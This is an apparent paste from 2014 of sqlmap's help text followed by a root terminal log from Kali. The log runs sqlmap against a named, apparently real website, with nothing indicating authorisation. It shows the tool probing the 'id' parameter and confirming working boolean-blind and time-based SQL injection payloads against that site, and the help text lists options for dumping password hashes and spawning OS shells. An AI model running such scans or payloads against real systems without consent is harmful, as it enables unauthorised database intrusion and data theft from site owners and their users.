sql BigByte

a guest
Jan 25th, 2014
Usage: python ./sqlmap [options]

Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
-v VERBOSE Verbosity level: 0-6 (default 1)

Target:
At least one of these options has to be specified to set the source to
get target urls from

-u URL, --url=URL Target url
-g GOOGLEDORK Process Google dork results as target urls

Request:
These options can be used to specify how to connect to the target url

--data=DATA Data string to be sent through POST
--cookie=COOKIE HTTP Cookie header
--random-agent Use randomly selected HTTP User-Agent header
--proxy=PROXY Use a HTTP proxy to connect to the target url

Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts

-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to this value

Detection:
These options can be used to specify how to parse and compare page
content from HTTP responses when using blind SQL injection technique

--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (0-3, default 1)

Techniques:
These options can be used to tweak testing of specific SQL injection
techniques

--technique=TECH SQL injection techniques to test for (default
"BEUSTQ")

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements

-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate

Operating system access:
These options can be used to access the back-end database management
system underlying operating system

--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC

General:
These options can be used to set some general working parameters

--batch Never ask for user input, use the default behaviour
--check-tor Check to see if Tor is used properly
--flush-session Flush session files for current target
--tor Use Tor anonymity network

Miscellaneous:
--wizard Simple wizard interface for beginner users

[!] to see full list of options run with '-hh'

[*] shutting down at 12:15:11

root@kali:~# sqlmap -u www.fabasket.com/noticia.php?id=1007 --dbs

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:15:29

[12:15:29] [INFO] testing connection to the target url
[12:15:30] [INFO] testing if the url is stable, wait a few seconds
[12:15:32] [INFO] url is stable
[12:15:32] [INFO] testing if GET parameter 'id' is dynamic
[12:15:32] [INFO] confirming that GET parameter 'id' is dynamic
[12:15:32] [INFO] GET parameter 'id' is dynamic
[12:15:33] [INFO] heuristic (parsing) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:15:33] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
do you want to include all tests for 'MySQL' ignoring provided level (1) and risk (1)? [Y/n] y
[12:15:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:16:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:16:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:16:06] [WARNING] reflective value(s) found and filtering out
[12:16:12] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[12:16:14] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[12:16:19] [INFO] GET parameter 'id' is 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' injectable
[12:16:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[12:16:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[12:16:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[12:16:19] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[12:16:19] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[12:16:20] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[12:16:20] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[12:16:20] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[12:16:21] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[12:16:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[12:16:21] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[12:16:22] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[12:16:22] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[12:16:22] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[12:16:22] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[12:16:22] [INFO] testing 'MySQL inline queries'
[12:16:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[12:16:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:16:23] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[12:16:23] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[12:16:23] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[12:16:23] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[12:16:23] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
[12:16:24] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[12:16:24] [INFO] testing 'MySQL >= 5.0 time-based blind - Parameter replace'
[12:16:25] [INFO] testing 'MySQL < 5.0 time-based blind - Parameter replace (heavy queries)'
[12:16:25] [INFO] testing 'MySQL time-based blind - Parameter replace (bool*int)'
[12:17:25] [INFO] GET parameter 'id' is 'MySQL time-based blind - Parameter replace (bool*int)' injectable
[12:17:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[12:17:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[12:17:34] [INFO] target url appears to be UNION injectable with 1 columns
[12:17:35] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. --dbms=mysql)
[12:17:35] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[12:17:40] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[12:17:48] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[12:17:55] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[12:18:03] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[12:18:13] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[12:18:18] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[12:18:22] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[12:18:31] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
[12:18:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 301 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)
Payload: id=MAKE_SET(3807=3807,1007)

Type: AND/OR time-based blind
Title: MySQL time-based blind - Parameter replace (bool*int)
Payload: id=(1006=1006)*SLEEP(5)
---
[12:18:48] [INFO] testing MySQL
[12:18:48] [WARNING] the back-end DBMS is not MySQL
[12:18:48] [INFO] testing Oracle
[12:18:49] [WARNING] the back-end DBMS is not Oracle
[12:18:49] [INFO] testing PostgreSQL
[12:18:49] [WARNING] the back-end DBMS is not PostgreSQL
[12:18:49] [INFO] testing Microsoft SQL Server
[12:18:49] [WARNING] the back-end DBMS is not Microsoft SQL Server
[12:18:49] [INFO] testing SQLite
[12:18:49] [WARNING] the back-end DBMS is not SQLite
[12:18:49] [INFO] testing Microsoft Access
[12:18:49] [WARNING] the back-end DBMS is not Microsoft Access
[12:18:49] [INFO] testing Firebird
[12:18:49] [WARNING] the back-end DBMS is not Firebird
[12:18:49] [INFO] testing SAP MaxDB
[12:18:50] [WARNING] the back-end DBMS is not SAP MaxDB
[12:18:50] [INFO] testing Sybase
[12:18:50] [WARNING] the back-end DBMS is not Sybase
[12:18:50] [INFO] testing IBM DB2
[12:18:50] [WARNING] the back-end DBMS is not IBM DB2
[12:18:50] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system, but from the HTML error page it was possible to determinate that the back-end DBMS is MySQL. Do not specify the back-end DBMS manually, sqlmap will fingerprint the DBMS for you

[*] shutting down at 12:18:50

root@kali:~#